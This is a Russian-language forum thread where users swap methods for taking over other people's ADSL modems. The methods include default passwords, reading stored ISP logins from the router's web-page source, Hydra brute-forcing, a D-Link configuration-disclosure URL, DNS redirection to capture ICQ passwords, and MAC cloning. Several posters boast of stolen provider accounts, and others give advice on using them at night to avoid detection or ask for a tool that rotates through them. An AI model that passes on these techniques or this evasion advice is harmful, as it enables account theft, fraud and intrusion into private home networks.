Скажем я получил контроль над модемом и его настройками. В насторйках можно указать DNS сервер который используется. Вопрос: Можно ли указав левый DNS сервер в нужный момент ответить, что скажем адресу login.icq.com соответствует мой IP адрес на котором открыт 5190 порт?
Реально ли так перехватить пароль на аску?

Скажем я получил контроль над модемом и его настройками. В насторйках можно указать DNS сервер который используется. Вопрос: Можно ли указав левый DNS сервер в нужный момент ответить, что скажем адресу login.icq.com соответствует мой IP адрес на котором открыт 5190 порт?
Реально ли так перехватить пароль на аску?

Имхо, можно, если есть возможность подменить dns-сервер в конфигураторе модема, надо пробовать. Но у меня, например, на модеме, который рассмотрен в этой статье, dns-сервера прописываются на самом компе (в настройках сетевого подключения). В конфигураторе эта опция есть, но не используется (не активна). Имхо надо пробовать! Я думаю если прописать dns и на мопеде, то у какого будет выше приоритет? Тот что в мопеде прописан или тот что в свойствах сетевого подключения? Я думаю у второго...

Имхо, можно, если есть возможность подменить dns-сервер в конфигураторе модема, надо пробовать. Но у меня, например, на модеме, который рассмотрен в этой статье, dns-сервера прописываются на самом компе (в настройках сетевого подключения). В конфигураторе эта опция есть, но не используется (не активна). Имхо надо пробовать! Я думаю если прописать dns и на мопеде, то у какого будет выше приоритет? Тот что в мопеде прописан или тот что в свойствах сетевого подключения? Я думаю у второго...
Имхо тот что в свойствах модема , т.к. сначала запрос днс по ип от ОС, а далее запрос по доменному имени от ОС, но через мопед, где уже будет прогписан ваш ип под ентот днс!

Shadow']Имхо тот что в свойствах модема , т.к. сначала запрос днс по ип от ОС, а далее запрос по доменному имени от ОС, но через мопед, где уже будет прогписан ваш ип под ентот днс!

Угу, надо пробовать, но имхо я думаю что мопед будет обращаться к прописанному внутри его dns-серверу, если в свойствах сетевого подключения пусто (не прописаны DNS). А так если прописаны, то на мопеде уже имхо не важно (он прозрачен для DNS). Вот если на нём самом был DNS-сервер, тогда чёт можно было точно сделать. А так х.е.з. мне кажется это зависит от реализации модема...

А если в модеме имеется функция доступа по SSH или telnet, ведь возможно поднятие туннеля?
Допустим у меня безлимитный локальный траффик...делаю туннель до модема "друга" и хожу в глобал через него. Возможно ли это?

А если в модеме имеется функция доступа по SSH или telnet, ведь возможно поднятие туннеля?
Допустим у меня безлимитный локальный траффик...делаю туннель до модема "друга" и хожу в глобал через него. Возможно ли это?
Там есть, имхо, управление по SSH и telnet мопедом, а вот туннель сделать дальше в глобал, имхо, нельзя...

но ведь из-под ssh проходят пинги до глобала...может быть возможно как-нить заворачивать этот траффик и доставлять удалённому пользователю?

но ведь из-под ssh проходят пинги до глобала...может быть возможно как-нить заворачивать этот траффик и доставлять удалённому пользователю?
На мопеде есть имхо только сервер ssh, а клиента там нет (там очень урезанная nix-подобная oc). Положим ты смог подключиться по ssh до конфигуратора мопеда, дальше ты должен будешь запустить клиент ssh на мопеде и коннектится далее в интернет к удалённому серверу. Но на мопеде имхо нет такого клиента, впрочем как и обычного шелла в нашем случае...

Всё конечно хорошо, но что можно сделать ещё?
Например: можно изменить Dns и сканить все данные,которые идут от пользователя, но что бы для поьзователя это было незаметно?

Я вот тут еще один косяк заметил...
хз как так получилось, но когда я выставил внутренний айпишник модема(Zyxel Omni Lan) на 192,168,0,1 - стал видеть все компы в сети...
по умолчанию айпи у него 192,168,1,1....
у кого какие мысли по этому поводу?

Я вот тут еще один косяк заметил...
хз как так получилось, но когда я выставил внутренний айпишник модема(Zyxel Omni Lan) на 192,168,0,1 - стал видеть все компы в сети...
по умолчанию айпи у него 192,168,1,1....
у кого какие мысли по этому поводу?

Кто стал видеть все компы в сети? Вопрос не ясен...

Я вот тут еще один косяк заметил...
хз как так получилось, но когда я выставил внутренний айпишник модема(Zyxel Omni Lan) на 192,168,0,1 - стал видеть все компы в сети...
по умолчанию айпи у него 192,168,1,1....
у кого какие мысли по этому поводу?
Какой именно ип (как я понял в свойствах сетевого подключения) "ip-адрес" или "Основной шлюз"?
И где ты их стал видеть- в сетевом окружении?...непонятно... :confused:

Слушайте помогите мну разобратцо. В Томской область, как и в далеком Казахстане bridge это редкость. Учетку прова увесть, как 2 пальца обос... Ну вот собстна вопрос: Увел я учетку, а каким образом за счет таго лузера в инете шерстать? Тоесть, Пр ;) ошу объястнитьв кратце как, что настроить.

Слушайте помогите мну разобратцо. В Томской область, как и в далеком Казахстане bridge это редкость. Учетку прова увесть, как 2 пальца обос... Ну вот собстна вопрос: Увел я учетку, а каким образом за счет таго лузера в инете шерстать? Тоесть, Пр ;) ошу объястнитьв кратце как, что настроить.
В треде имхо все ответы и вопросы есть. Имхо если и получится заюзать чужой акк (что маловероятно) то вычислят очень быстро (быстрее чем с чужим DIAL-UP). Кроме того мопед на внешнем интерфейсе имеет MAC, который так просто не заменить, так как он, имхо, зашит в железе, а не в прошивке...

Кста некоторые мопеды подерживают SNMP http://ru.wikipedia.org/wiki/SNMP
и софт под винду WinAgents MIB Browser. Самое интересное шо пасс и айпишник
(на примере P-660RT) задаються тока под телнетом :)) И почти у всех (шо я сканил)
было открыто. В некоторых мопедах мона поменять параметры.

А что можно сделать с модемом кроме как просто получить Adsl акк и менять настройки модема??? можно ли проснифать траф???каким образом??

А что можно сделать с модемом кроме как просто получить Adsl акк и менять настройки модема??? можно ли проснифать траф???каким образом??
Поставишь сниффер во внутреннюю сеть - проснифаешь, но это предполагает, что ты взломаешь какой-либо из компов внутри локалки...

Default Password List
2007-07-03

http://www.phenoelit-us.org/dpl/dpl.html

Я взломал городской колледж.скажите как перепрошить мак адрес на модеме?и еще..как попасть на машины находящиеся в лок сети с тем компом к которому есть доступ из инета?заранее благодарю

и еще,..попал на d-link модем вообщем в коде пишет :
<html>
<head>
<script>
var F5End = 3;//0:fsil 1:success 2:programing 3:skipped
var F5Seg = 3;
var reloadpage = "../cgi-bin/webcm?getpage=../index.htm";
</script>
</head>

<frameset rows="0,*" frameborder="0" framespacing="0">
<frame name="fPanel" src="" scrolling="auto" marginwidth="0" marginheight="0">
<frame name="fInfo" src="../cgi-bin/webcm?getpage=../html/home.htm">
<noframes>
<body bgcolor="#008080">
<p>This page uses frames, but your browser doesn't support them.</p>
</body>
</noframes>
</frameset>
</html>

и как мне теперь узнать ссылку на страницу с пассом?ничего не понимаю =(

Давно мучал вопрос. У меня лежит около сотни учеток моего прова, хотелось бы воспользоваться ими (по качать на халяву), но беспокоюсь за свою безопасность. Как бы сделать так что бы пров не смог поймать меня на месте преступления? Не хотелось бы чтоб меня отключили =)

и еще,..попал на d-link модем вообщем в коде пишет :
<html>
<head>
<script>
var F5End = 3;//0:fsil 1:success 2:programing 3:skipped
var F5Seg = 3;
var reloadpage = "../cgi-bin/webcm?getpage=../index.htm";
</script>
</head>

<frameset rows="0,*" frameborder="0" framespacing="0">
<frame name="fPanel" src="" scrolling="auto" marginwidth="0" marginheight="0">
<frame name="fInfo" src="../cgi-bin/webcm?getpage=../html/home.htm">
<noframes>
<body bgcolor="#008080">
<p>This page uses frames, but your browser doesn't support them.</p>
</body>
</noframes>
</frameset>
</html>

и как мне теперь узнать ссылку на страницу с пассом?ничего не понимаю =(
Пишешь в строке броузера: айпи/cgi-bin/webcm?getpage=../html/home.htm потом заходишь опять туда где имя пользователя и пасс звездочками скрыт, смотришь исходный код.

Столкнулся с проблемой: большинство юзверей у моего прова юзают одинаковые модемы, но на странице где надо ввести логин/пасс нет ничего о том что это за модем...
вот скрин: http://orencitysait.narod.ru/modem.bmp
может кто знает что это за модем?

Столкнулся с проблемой: большинство юзверей у моего прова юзают одинаковые модемы, но на странице где надо ввести логин/пасс нет ничего о том что это за модем...
вот скрин: http://orencitysait.narod.ru/modem.bmp
может кто знает что это за модем?

Лучше бы выложил не скрин а исходник в HTML!

Лучше бы выложил не скрин а исходник в HTML!

<html>
<head>
<title>&gt;Log In</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta http-equiv="Pragma" content="no-cache">
<style type="text/css">
body {
margin: 0px 0px;
font-family: Verdana, Geneva, Arial, Helvetica, sans-serif;
font-size: 9pt;
font-weight: normal;
text-decoration: none;
color: #2A2A2A;
}
p, td {
}
.header
{
font-family: Verdana, Geneva, Arial, Helvetica, sans-serif;
font-size: 8pt;
font-weight: bold;
}
.inputButton
{
border-color: #505050;
border-width: 1px;
background-color: #9595C7;
font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight: Bold;
font-size: 11px;
color: #FFFFFF;
width: 61px;
height: 18px;
vertical-align: middle;
margin: 4px;
}

</style>
<script language="JavaScript">
function uiDoOnLoad()
{
document.getElementById("uiViewUserName").value=document.getElementById("uiPostUserName").value;
document.getElementById("uiViewUserName").focus()
//top.resizeTo(1024,780);
if(document.getElementById("uiPostErrorState").value=="1")
document.getElementById("uiViewErrorMessage").style.color="#CC3366";
}
function uiDoSave()
{
document.getElementById("uiPostUserName").value=document.getElementById("uiViewUserName").value;
document.getElementById("uiPostPassword").value=document.getElementById("uiViewPassword").value;
document.getElementById("uiPostForm").submit();
}
</script>
</head>
<body onload="uiDoOnLoad()" bgcolor="#FFFFFF" leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
<form method="POST" action="../cgi-bin/webcm" target="_self" id="uiPostForm" >
<input type="hidden" name="var:main" value="menu" id="uiPostMenuMain">
<input type="hidden" name="var:style" value="style5" id="uiPostMenuStyle">
<input type="hidden" name="getpage" value="../html/defs/style5/menus/menu.html" id="uiPostGetPage">

<input type="hidden" name="errorpage" value="../html/index.html" id="uiPostErrPage">
<input type="hidden" name="var:pagename" value="home" id="uiPostPageName">
<input type="hidden" name="var:errorpagename" value="home" id="uiPostErrorPageName">
<input type="hidden" name="var:menu" value="home" id="uiPostMenu">
<input type="hidden" name="var:menutitle" value="Home" id="uiPostMenuTitle">
<input type="hidden" name="var:pagetitle" value="Home" id="uiPostPageTitle">
<input type="hidden" name="var:pagemaster" value="home" id="uiPostPageMaster">
<input type="hidden" name="" value="<? error found ?>" id="uiPostErrorState" disabled>
<input type="hidden" name="login:command/username" value="" id="uiPostUserName">
<input type="hidden" name="login:command/password" value="" id="uiPostPassword">
</form>

<!-- Outer Table-->
<table width=761 cellpadding=0 cellspacing=0 align=center border=0>
<tr><td width=761 height=36 nowrap></td></tr>
<tr>

<td width=761 align=left valign=top>

<!-- Main Page -->
<form onsubmit="return false;">

<table cellspacing=1 border=0 cellpadding=4 align=center id="uiViewBodyTable" bgcolor="#000000" width="760" height="390">
<tr>
<td bgcolor="#000000" height=22 class="header"><font size=1 color="#FFFFFF">Please Log In to continue.</font></td>
</tr>
<tr>

<td bgcolor="#ECECEC">

<table cellspacing=0 border=0 cellpadding=0 align=center id="uiViewBodyTable" width=300>
<tr><td colspan=2 align=center class="header">Log In</td></tr>
<tr><td colspan=2 height=8></td></tr>
<tr><td colspan=2 height=1 bgcolor="#505050"></td></tr>
<tr><td colspan=2 height=10></td></tr>
<tr>
<td nowrap align=right><font size=2 class="header"><b>Username: </b></font></td>

<td align=left><input type="text" value="" size="16" maxlength="64" name="uiViewUserName" id="uiViewUserName"></td>
</tr>
<tr>
<td nowrap align=right ><font size=2 class="header"><b>Password: </b></font></td>
<td align=left><input type="password" value="" size="16" maxlength="64" name="uiViewPassword" id="uiViewPassword""></td>
</tr>
<tr><td colspan=2 height=10></td></tr>
<tr><td colspan=2 height=1 bgcolor="#505050"></td></tr>
</table>


</td>
</tr>
<tr>
<td colspan=4 align=left bgcolor="#ECECEC" height=28>
<table border=0 cellpadding=0 cellspacing=0 width="100%">
<tr>
<td align=center id="uiViewErrorMessage" style="color:#ECECEC;"><b>Error:&nbsp;<? error message ?>&nbsp;</b></td>
<td align=right><input type="submit" value="Log In" onclick="uiDoSave()" class="inputButton"></td>

</tr>
</table>
</td>
</tr>
</table>

</form>

<!-- END main Page -->

</td>

</tr>
</table>
<!-- END Outer Table -->


</body>
</html>

<td align=left><input type="text" value="" size="16" maxlength="64" name="uiViewUserName" id="uiViewUserName"></td>
</tr>
<tr>
<td nowrap align=right ><font size=2 class="header"><b>Password: </b></font></td>
<td align=left><input type="password" value="" size="16" maxlength="64" name="uiViewPassword" id="uiViewPassword""></td>

Как видно из кода, в явном виде логин и пасс не прописаны (пустая строка).
По нажатию кнопки вызывается функция uiDoSave(), которая передаёт введённые логин и пасс из формы, обработчику формы:

document.getElementById("uiPostUserName").value=document.getElementById("uiViewUserName").value;
document.getElementById("uiPostPassword").value=document.getElementById("uiViewPassword").value;
document.getElementById("uiPostForm").submit();

<form method="POST" action="../cgi-bin/webcm" target="_self" id="uiPostForm" >
<input type="hidden" name="var:main" value="menu" id="uiPostMenuMain">
<input type="hidden" name="var:style" value="style5" id="uiPostMenuStyle">
<input type="hidden" name="getpage" value="../html/defs/style5/menus/menu.html" id="uiPostGetPage">

<input type="hidden" name="errorpage" value="../html/index.html" id="uiPostErrPage">
<input type="hidden" name="varagename" value="home" id="uiPostPageName">
<input type="hidden" name="var:errorpagename" value="home" id="uiPostErrorPageName">
<input type="hidden" name="var:menu" value="home" id="uiPostMenu">
<input type="hidden" name="var:menutitle" value="Home" id="uiPostMenuTitle">
<input type="hidden" name="varagetitle" value="Home" id="uiPostPageTitle">
<input type="hidden" name="varagemaster" value="home" id="uiPostPageMaster">
<input type="hidden" name="" value="<? error found ?>" id="uiPostErrorState" disabled>
<input type="hidden" name="login:command/username" value="" id="uiPostUserName">
<input type="hidden" name="login:command/password" value="" id="uiPostPassword">
</form>

Обработчик на серверной стороне (на мопеде) и ему передаётся куча скрытых переменных, имхо, без анализа исходников обработчика вряд ли удастся обойти авторизацию...

ЗЫ попробуй подставлять значения переменных, которые есть в форме:

../html/defs/style5/menus/menu.html
../html/index.html

-=lebed=- спасиб, попробую
ЗЫ: мне попался такой мопед на примере которого статья писалась, где 1234 было изменено на admin :D

Спасибо за статью, очень помогла. ;)
1)С модемами Zyxel и D-Link я разобрался, а вот с BILLION трабла выходит =\
В параметре РРР
окна юзер нейм и паспорт окна остаются пустыми... =\
ни как не могу получить вывод данных.
2) В некоторых постах люди говорят про брут, вопрос такой если вы брутите гидрой то какой сервис указываете http-?

Спасибо за статью, очень помогла. ;)
1)С модемами Zyxel и D-Link я разобрался, а вот с BILLION трабла выходит =\
В параметре РРР
окна юзер нейм и паспорт окна остаются пустыми... =\
ни как не могу получить вывод данных.
2) В некоторых постах люди говорят про брут, вопрос такой если вы брутите гидрой то какой сервис указываете http-?
1) Если ты имеешь в виду Модем что указан на скриншете
http://bodrov.user.kz/fpn/img/adsl.gif
То это скорей всего briging, по ходу пасс на компе. Хотя у меня ловились и эти модемы. Недавно то-же такой вопрос волновал. Только там в "исходный код страницы"
Пароля не видно, так я просто сохранял пароль в Лисе а потом лез в Инструменты\Настройки\3ащи� �а\Показать пароли
2) Посмотри по каким сервисам работает брут. Лично у меня не получилось гидрой сбрутить пасс, хотя он присутствовал в пасс-листе. =\\\

В дополнение к статье Автора.
Еще лучше узнать MAC-адрес ломаемого модема и при подкл. поменять свой МАС на МАС того модема который вы взломали. Делается это просто:
http://ххх.ххх.ххх.хх/rpSys.html
Жмем System Status и видим в <b>LAN Information</b>

MAC Address:00:13:49:c6:73:01
IP Address: 192.168.1.1
IP Subnet Mask: 255.255.255.0
DHCP: Server
DHCP Start IP: 192.168.1.33
DHCP Pool Size: 32

я вчера через телнет вошел на свой модем DLink там стоит Linux (2.4.17...) ничего странного, но когда я посмотрел файл shadow то увидел примерно такое

#cat shadow
root:*************:11876:0:99999:7:::
admin:*************:11876:0:99999:7:::
user:AB.3YPYZx5U/U:11876:0:99999:7:::
#

пользавотели root и admin имеют одинаковый хеш паролей и пароль тоже одинаковый, а есть еще один пользователь user также в passwd примерно такое

#cat passwd
root:x:0:0:Root,,,:/:/bin/sh
admin:x:0:0:Admin,,,:/:/bin/sh
#

непойму есть ли пользователь user в системе или нет

если есть то как подобрать пароль из хеша

я вчера через телнет вошел на свой модем DLink там стоит Linux (2.4.17...) ничего странного, но когда я посмотрел файл shadow то увидел примерно такое

#cat shadow
root:*************:11876:0:99999:7:::
admin:*************:11876:0:99999:7:::
user:AB.3YPYZx5U/U:11876:0:99999:7:::
#

пользавотели root и admin имеют одинаковый хеш паролей и пароль тоже одинаковый, а есть еще один пользователь user также в passwd примерно такое

#cat passwd
root:x:0:0:Root,,,:/:/bin/sh
admin:x:0:0:Admin,,,:/:/bin/sh
#

непойму есть ли пользователь user в системе или нет

если есть то как подобрать пароль из хеша
Копай дальше, может продолжение статьи напишешь... ;)

я вчера через телнет вошел на свой модем DLink там стоит Linux (2.4.17...) ничего странного, но когда я посмотрел файл shadow то увидел примерно такое Какая модель модема? и почемц через телнет? Просто самого интересует... )))
Вот легкий способ(узрел в видео на milw0rm'e)

For example, making the following request:

http://dlink-DWL-2100ap/cgi-bin/Intruders.cfg
We would have a result equivalent to the following:

Сам сграбленный видак можно слить тут: Скачать 1,65МВ (http://forum-pro.net/files/video/D_Link.rar)

Спс автору! Все получилось!
Зы. Один раз попался Длинк 500t , с ним такая схема непрокатит.
Зато с Зюкселем всё отлично получилось.)

Какая модель модема?

DLink-500T

Сам сграбленный видак можно слить тут: Скачать 1,65МВ (http://forum-pro.net/files/video/D_Link.rar)

немогу посмотреть :( не читает мой Riva FLV Player я так понял это файл *.flv подскажите где взять плеер или кодек

DLink-500T



немогу посмотреть :( не читает мой Riva FLV Player я так понял это файл *.flv подскажите где взять плеер или кодек
Скинь скрин конфигуратора сюда.....
Про видео, я х.з. обнови кодеки я его медиаплеером смотрел ;) .

Скинь скрин конфигуратора сюда.....

какой?

http://www.krasnet.ru/krasnet/clients/instr/adsl/adsl.files/image018.jpg

если не тот напиши конкретней

Такая фишка не прокатит с D-Link роутерами! тама твой пароль хранится в конфиге, который зашифрован... Как его расшифровать я хз, а вот с ZyXeL прокатит=)) я уже себе так несколько учёток свистнул от корбины=) народ не шифрует свои сети... и пассы оставляют дефолтные... На самом деле не знаю кому эта тема было полезной... мне в первую очередь пришло в голову именно так посмотреть пасс...
С D-Linkа можно стыбзить конфиг файл и потом его закинуть себе на роутер... если конечно роутеры одинаковые...

Mib (http://ru.wikipedia.org/wiki/Management_Information_Base) -ами для престижей поделитесь?

Кто нибудь расскажите подробнее об использовании угнаной учётки...

Кто нибудь расскажите подробнее об использовании угнаной учётки...
1. Иногда учётка подходит ко входу в личный кабинет на сайте прова (можно смотреть историю выходов в инет, трафик, задолжность и т.п.) а может подойти и ещё к чему-то...
2. Можно перенастроить мопед хозяина (редирект в NAT или перевести модем в режим bridge)
3. Попробовать заюзать чужую учётку на другой линии DSL (халявный интернет) бесполезно - вычислят имхо быстрее чем на Dial-up.
4. Теоретически можно попробовать сделать так:
Взламываем мопед соседа по провайдеру, переводим модем в режим brige, взламываем комп хозяина учётки и ставим на него http или socks-проксю. Если тарифы внутренней сети и внешней разные - то экономим деньги, лазая за чужой счёт. (У нас одно время внутренний траффик был вообще бесплатный)

ЗЫ Больше вариантов применения я не вижу...

не наю кому как, но вчера запоимел логин пасс ;)
автор спс! ;)
для каждой статьи есть свой круг читателей, есть те, что читают только дебилы. но эта не относится к их числу! спс !;)
--------------------------
мммм...
сначала не читал топ полностью, ща последнюю страницу глянул:
1. в личный кабинет на сайте прова не покатит (у кого как, у мну пароль на дсл генерит система, в кабинет - регаешься сам)
2. все тарифы у прова анлим - можна и посидеть ночью))
3. продавать мона)))) - но это еще более идиотизм чем самому юзать )

Нашол вот такую штуку что с ней можно зделать?
http://www.hitech-online.ru/articles/mod70916_D-Link_DES-3326SR.html

Мне интересно, как пров обнаруживает, что чел сидит под левым акком? понятно, что с начало должен заявить облопошиный-клиент о пропаже денег со счета, но если он не заявит об этом, то как. объясните? либо юзаешь акк анлимит. Да еще... читал договор своего прова. там написано, что использования аккаунта третими лицами разрешино. А при мошенничестве, провайдер просто расторгнет договор с клиентом.

-=lebed=-,
3. Попробовать заюзать чужую учётку на другой линии DSL (халявный интернет) бесполезно - вычислят имхо быстрее чем на Dial-up.

Как ты делал выводы? На чем базируются? От чего изходил?

из привязки DSL линии к тел. номеру. (по одной паре проводов всё идёт) -=lebed=-

Кто знает какими средствами можно изменить Mac-адрес aDSL-модема?
Имхо без программатора тут не обойтись, при замене прошивки его изменить вроде тоже нельзя. А зачем кстати менять? В конфигураторе нет такой возможности? Вообще в них часто используется линукс-подобная урезанная ОС так что копать надо в эту сторону, была статья в ][ - там меняли прошивку и превращали модем в мини-компьютер. прим. -=lebed=-

Ты хочешь сказать что в любом модеме с технологией aDSL есть NAT, фаер и устройства удаленного управления???
в любом адсл роуторе - кроме строго сименса, если это конечно не модем который при этом ещё поддерживает ip телефонию, там помоему только телсей имеет веб интерфейс , а так телнет ешё никто не отменял ...

3. Попробовать заюзать чужую учётку на другой линии DSL (халявный интернет) бесполезно - вычислят имхо быстрее чем на Dial-up.
.

на сколько я вижу каждый день перед собой данные логи ., я тебе скажу что это не реально , ибо в логах радиуса не пишется с какой ты линии залогинился.... если не диолап конечно =) а РРРОЕ
И юзается очень даже приятно , у нас на работе в прове порты сцука забанены , а ночью когда хочется развлечься , именно таким образом сканем, ищем кто на большом тарифе и у кого кешфло чист , и уже смотрим пасс и логин , понятное дело мне проще.. так как у меня биллинг под рукой. и не надо юзать баги в роутерах, кстати бага старая как век...

-=lebed=Имхо без программатора тут не обойтись, при замене прошивки его изменить вроде тоже нельзя.
Проблему уже решил. есть модемы в которых можно менять, либо при прошивки прям из под веб-интерфейса.
А зачем кстати менять?
У моего прова, при оформления договора нужно сказать Mac модема, тоесть они определяют по маку, а не по телефонной линии - привязки ни какой не может быть, знающие люди, тоже самое скажут.
У моего прова ничего говорить не надо (я про MAC), при заключении договора, у нас привязка есть, на чужом аккуанте не получается сидеть на другой dsl-линии. -=lebed=-

Не понятно одно, как может быть привязка номера, сужу по следующей схеме:
http://img337.imageshack.us/img337/128/adsl12dl6.th.gif (http://img337.imageshack.us/my.php?image=adsl12dl6.gif)
DSL-AM где установлен, там и определить можно. У нас даже оплата за телефон и интернет идёт одним платежом, где указывается телефон и имя владельца номера, только код платежа другой. -=lebed=-

Люди прошу объяснить что нужно сделать чтобы не заловили???...

Pain4ik,не юзать чужой инэт;-)

У моего прова ничего говорить не надо (я про MAC), при заключении договора, у нас привязка есть, на чужом аккуанте не получается сидеть на другой dsl-линии.
Если есть привязка, вывод что ты не можешь юзать левые акки, так? Пересопатил много инфы по поводу DSLAM'a.
основные возможности любого DSLAM'a:
- Функция включения/выключения порта для каждой линии
- Установка максимальной скорости для каждой линии
- Разрешение/запрещение передачи пакетов между каналами IP
- MAC фильтрация для каждого порта
- Многопортовый uplink с возможностью каскадирования
---
Тут есть люди, которые работали с данным оборудованием или нет? А то не какой конкретки, только одни домыслы.

Всем привет, кто подскажет. Вот влез в модем, все замечательно, знаю все данные, записал МАК, у себя оставил. Но во многих сетях айпишники динамические, и как потом мне ломануться на этот модем если я знаю его МАК. Просто допустим надо мне. Подскажите пожалуйста.

Сканить и искать МАС такой-же, чем? смотри по линку ниже.
http://forum.antichat.ru/threadnav16214-1-10.html

Что я из того ничего не понял, извините за несообразительность, можешь описать? Ну есть у меня МАК адрес модема удаленного, ну вышел я с инета и он тоже, у обоих при следующем входе разные айпишники, как найти? Может туплю но прошу помочь. И еще что запихать на комп жертвы троя? шелл?

На некоторые модемы можно апать файлы, как тереть пока недодумался ибо пока ненашол как посмотреть листинги директорий и вообще либо какую инфу о фс. с внешнего хоста пока апнуть неудалось говорит нада мол dns . зато с лана по ip апнул текстовик и смог прочитать его телнет средствами. поддерживает http и ftp протоколы ) сейчас розбераюсь с конфигами если ченеть интересное нарою выложу видео )

ИМХО:
Вообщем подтверждаю, все работает, но как находить именно те модемы, которые спрашивают пароль???, в основном это те модемы которые предназначены, для сетки от двух компов и выше, у меня вроде такого нет, так как модем чисто для одного компа!
А то так сканишь, насканивает дофига пользователей, которые в сети... а нужных мало :(

И по поводу, как юзать чужие аккаунты:

1. Желательно узнать пароли от Личного кабинета, вероятность большая, что пароль и логин такой же, как и при подключении к Интернету! Вот узнали, заходим в кабинет и смотрим, в какое время в основном сидит пользователь в инете, анализируем... в это время лучше не суваться...
И можно юзать прям со своего модема, главное не наглять, чтобы юзер не звонил в тех. поддержку, юзайте НОЧЬЮ! Ведь в это время, как-то не прилично звонить в саппорт, да и попытался пару раз юзер подключиться к инету, не получилось и пошел спать, а на утро все норм.. :)
2. Купить второй модем, и этот модем юзать только на чужих аккаунтах АДСЛа, на своем не светить! На своем аккаунте лазить с другого модема...
3. Юзайте безлимит, и на Вас злиться то никто не будет, только не наглете!!!

И всё! Незнаю, как у вас в России, а у нас в саппорт звонить, нужны железные нервы!
Да и в Договоре написано, мол потеряли свои логин и пароль, мол сами виноваты...


А вообще собственно пишу, хочу спросить может есть программка, которая через определённое время переподключается к другому аккаунту!
Забил кучу логинов и паролей и юзай по 10 минут каждый... ;) Точно никто и звонить никуда не будет .
Может кто напишет такую программку? :)

Народ, у меня появился вопросик, Почему иногда я залажу на Аккаунт он работает, в другой раз, нет...., с чем это связано???

Народ, у меня появился вопросик, Почему иногда я залажу на Аккаунт он работает, в другой раз, нет...., с чем это связано???
неужели сам не додумался?
Просто тот акк щас в сети. вот и всё

Вот смотри, если у него комп выключен, а модем включен, то счетается что он офф?!

Вот смотри, если у него комп выключен, а модем включен, то счетается что он офф?!
Нет не офф, модем-то уже соединён с провом, PPPОe соединеение уже есть.

Не обязательно, если модем настроен роутером (маршрутизатором), то акк будет онлайн при включенном модеме. Проверить как настроен модем- роутер или мост (bridge) можно, попинговав его IP, когда он гарантированно в сети. Обычно пинги на роутере обрубаются встроенным фаерволлом. Если у него мост (bridge), пинги обычно проходят. При настройке модема бриджем, модем уже не является самостоятельным девайсом, получающим IP-адрес (он выдается уже самому компу).

P.S. Что за модем вообще?

Да лучше уж модем задоссят, чем комп, это раз, а во вторых если бридж, то комп светит всеми сервисами на нём крутящимися в Инет, что не есть гуд. А так поставил в роутер, настроил в Nat редирект по нужным портам и спи спокойно...
ЗЫ Раз есть роутер в мопеде, то глупо его не юзать, имхо...

Ну про ддос я сказал, если в локалке провайдера практикуются "ддос-войны" обыкновенных юзеров. Так ведь получится, что вся система будет работать без вмешательства человека, и входящий канал будет не совсем забит. Но если будут коллективные ддосы, да еще с широких каналов, то ничто не поможет, только телефон техподдержки :).
P.s. Сам пользуюсь роутером. Мост меня разочаровал за неделю использования.

Народ, а если у меня Usb модем, настраивается он вроде как роутер и как бридж, но в сам модем я войти через браузер немогу, и настройки у него только для подключения, доп настроек нет типо удаленое подключение и пароль немогу поменять для входа в конфигуратор?

usb адсл модемы- не айс, имхо. По своему функционалу. А какая модель модема то?

допустим я зашел на чей-то модем по дефолтному пасу. я хочу зайти к нему на комп или в его сетку, и написать что он ламак и посатвил другой пароль. пароль прова мне не интересен. как настроить его модем? НАТ дает возможность открыть только один комп, так? а если я поставлю модем в режим бридж, и потом снова установлю в режим роутера - у него не сбросятся настройки провайдера, а именно логин и пороль? Чтоб вы понимали, я не хочу ничего портачить а просто предупредить чувака что у него дырка

Адсл модем с соединением с компом по витой паре не может быть настолько дырявым, чтобы залезть к человеку на комп или в его сетку. Разве что перепрошить сам модем кустарной самопальной прошивкой. А так- максимум сменить пароль, стырить чужие пасс и логин на инет (первое сбрасывается тырканьем в ресет, второе доступно только в режиме роутера), пооткрывать- позакрывать порты (опять же с роутером). Лучше найти способ предупредить чувака как нибудь по-другому. А если способа нет- лучше даже не пытаться, дурака сами знаете что исправит. При переходе из роутера в бридж и назад, сброс настроек разумеется будет, т.к , в-основном, многие модемы (если не все не держат) больше одного подключения к одному и тому же провайдеру, т.е. при переходе старый профиль подключения удалится.

Как же меня бесит, когда люди не могут сказать модель модема. Да хотя бы фирму... Здесь же много частных случаев, много разнообразия в настройках...

Просканил сеть сим совковым методом который еще 3 года назад на стриме юзал... Был удивлен числу людей не меняющих пароли.
Кстати на стриме года полтора юзал чужие акаунты. Никто не запалил, но! потом пришлось им доплачивать за повторное подключение... Щас цены не те... луче свой интернет юзать... если у вас не домолинк где пров с ценами просто наглеет

Глупо считать, что ЦентрТелеком везде с ценами наглеет. В нашей области цены на домолинковские анлимы заметно снизились. Зато, к сожалению, появились отдельные тарифные планы для области и областного центра. Первые, естественно, отличаются в худшую сторону.
З.Ы. ЦТ чуть более чем на половину контролирует соответствие используемого логина и телефонной линии. Во всяком случае, у нас.

kakoy_nafig_nik
Ты случайно не с Липецка ?
Раньше контроля небыло полностью ...
Сейчас-же аккаунты привязывают (или как правильней сказать) к телефонной линии, на какую оформлен аккаунт !

Сейчас-же аккаунты привязывают (или как правильней сказать) к телефонной линии, на какую оформлен аккаунт !
ыыы это обойти как 2 пальца об асфальт. Ломаем модем, и пробрасываем порт в модеме на проксю провайдера - халявный и беспаленный проксик готов.

пробрасываем порт в модеме на проксю провайдера
Можно попобдробней в лс или в icq ?

Можно попобдробней в лс или в icq ?
а чего тут мудреного? ломаешь модем, поднимаешь на нем роутер, который настраиваешь на прокси провайдера, у себя прописываешь как шлюз IP взломанного модема...готово

не очень понятно можете по шагам обьяснить как это сделать(после захождения на модем поднять роутер и юзать его)..плюсами не обижу

Модемов куча с пассами
admin:admin Хуавеи в основном !
Вопорс, как поднять роутер, порт прокинуть не проблема ...

почему так????я взломал акк и пишет доступ запрещен,посмколько такие имя пользователя и пароль не доступны в этом домене ошибка 691 (что это такое помогите пожалуйста)

наверно акк занят, а наверно там денег нет =\

вот блин. У мну как раз недавно ломанули мой модем, пришлось ресетить, менять пассворд админа и включать защиту от брута. Вообще ппц. Час потратил, пока настройки нашел. А потом еще опять вайфай поднял. Ужас. Накой таким заниматься? Все равно трафиком восполлзоваться не удастся.

Хм, статья возможно будет интересна новичкам =)
